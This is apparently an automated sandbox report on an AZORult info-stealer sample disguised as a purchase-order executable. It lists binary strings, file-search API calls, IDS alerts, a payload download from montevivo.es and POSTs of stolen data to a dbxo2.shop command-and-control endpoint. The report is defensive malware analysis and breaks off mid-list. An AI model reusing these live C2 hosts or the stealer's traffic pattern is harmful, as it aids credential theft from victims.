                    Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7151568728.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.5.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.5.dr
                    Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7192860880.000000001E610000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7153506909.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195985940.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7154557567.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195774303.000000001E648000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196171931.000000001E654000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7137545133.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192063322.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7157618680.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196659326.000000001E664000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196318925.000000001E658000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195985940.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195774303.000000001E648000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196442274.000000001E65C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7156953736.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196171931.000000001E654000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196550840.000000001E660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7161475490.000000001DCBC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7161350303.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197174638.000000001E688000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197291781.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7193344870.000000001E61C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192860880.000000001E610000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193449641.000000001E620000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193081967.000000001E614000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7145957838.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7145338066.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193218179.000000001E618000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.5.dr
                    Source: Binary string: qipcap.pdb0 source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, qipcap.dll.1.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.5.dr
                    Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.5.dr
                    Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7147239448.000000001DCBC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7147080304.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.5.dr
                    Source: Binary string: vcruntime140.i386.pdb source: PO No. 3200005919.exe, 00000005.00000003.7191720901.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7216382572.000000001DC98000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.5.dr
                    Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197360510.000000001E698000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7162088614.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-utility-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196318925.000000001E658000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195985940.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195774303.000000001E648000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196442274.000000001E65C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196171931.000000001E654000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.5.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.5.dr
                    Source: Binary string: msvcp140.i386.pdbGCTL source: PO No. 3200005919.exe, 00000005.00000003.7207591372.000000001D9A8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7174962411.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7174178046.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.5.dr
                    Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195774303.000000001E648000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7152463127.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.5.dr
                    Source: Binary string: D:\Kelly1076\__HITDisplay__\00_Code\ProArt Code_Git\ProArt\x64\Release\WMIMethod.pdb source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, WMIMethod.dll.1.dr
                    Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7192792717.000000001E604000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192477101.000000001E5F8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7141392781.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192708827.000000001E600000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192605806.000000001E5FC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7141563170.000000001DCBC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192063322.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192298891.000000001E5F4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l2-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7197871193.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197668078.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197360510.000000001E698000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7193344870.000000001E61C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192860880.000000001E610000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193081967.000000001E614000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7145338066.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193218179.000000001E618000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7192860880.000000001E610000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193081967.000000001E614000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193218179.000000001E618000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7196731869.000000001E670000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7159539905.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7160196459.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197102801.000000001E67C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196892223.000000001E674000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197003158.000000001E678000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7166478515.000000001DCBC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7165324032.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.5.dr
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_00402862 FindFirstFileW,
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_004066F3 FindFirstFileW,FindClose,
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_00405ABE CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,

                    Networking

                    barindex
                    Source: TrafficSnort IDS: 2029468 ET TROJAN Win32/AZORult V3.3 Client Checkin M15 192.168.11.20:49830 -> 104.21.2.6:80
                    Source: TrafficSnort IDS: 2029137 ET TROJAN AZORult v3.3 Server Response M2 104.21.2.6:80 -> 192.168.11.20:49830
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: global trafficHTTP traffic detected: GET /lPkFJXszrxOMoP0.hhp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: montevivo.esCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /dbx2/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: dbxo2.shopContent-Length: 111Cache-Control: no-cacheData Raw: 00 00 00 41 70 9d 32 13 8b 30 60 8b 30 63 8b 30 6c 8b 30 67 8b 30 67 8b 31 11 8b 30 6c 8b 30 61 8b 30 64 8b 30 61 8b 30 6c 8b 30 65 8b 30 62 ef 26 67 ea 42 70 9d 35 70 9d 32 10 8b 30 64 8b 30 60 eb 45 70 9c 47 10 8b 30 64 ef 26 66 97 26 66 9d 42 70 9d 37 70 9d 36 70 9c 47 70 9d 35 70 9d 37 70 9d 33 13 ec 26 66 9a 26 66 9e 26 66 98 Data Ascii: Ap20`0c0l0g0g10l0a0d0a0l0e0b&gBp5p20d0`EpG0d&f&fBp7p6pGp5p7p3&f&f&f
                    Source: global trafficHTTP traffic detected: POST /dbx2/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: dbxo2.shopContent-Length: 23000Cache-Control: no-cache
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: PO No. 3200005919.exe, 00000005.00000002.7267996696.000000001D8D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: HTTPS://LOGIN.LIVE.COM/
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7188963391.000000001DCE4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, WMIMethod.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, WMIMethod.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                    Source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 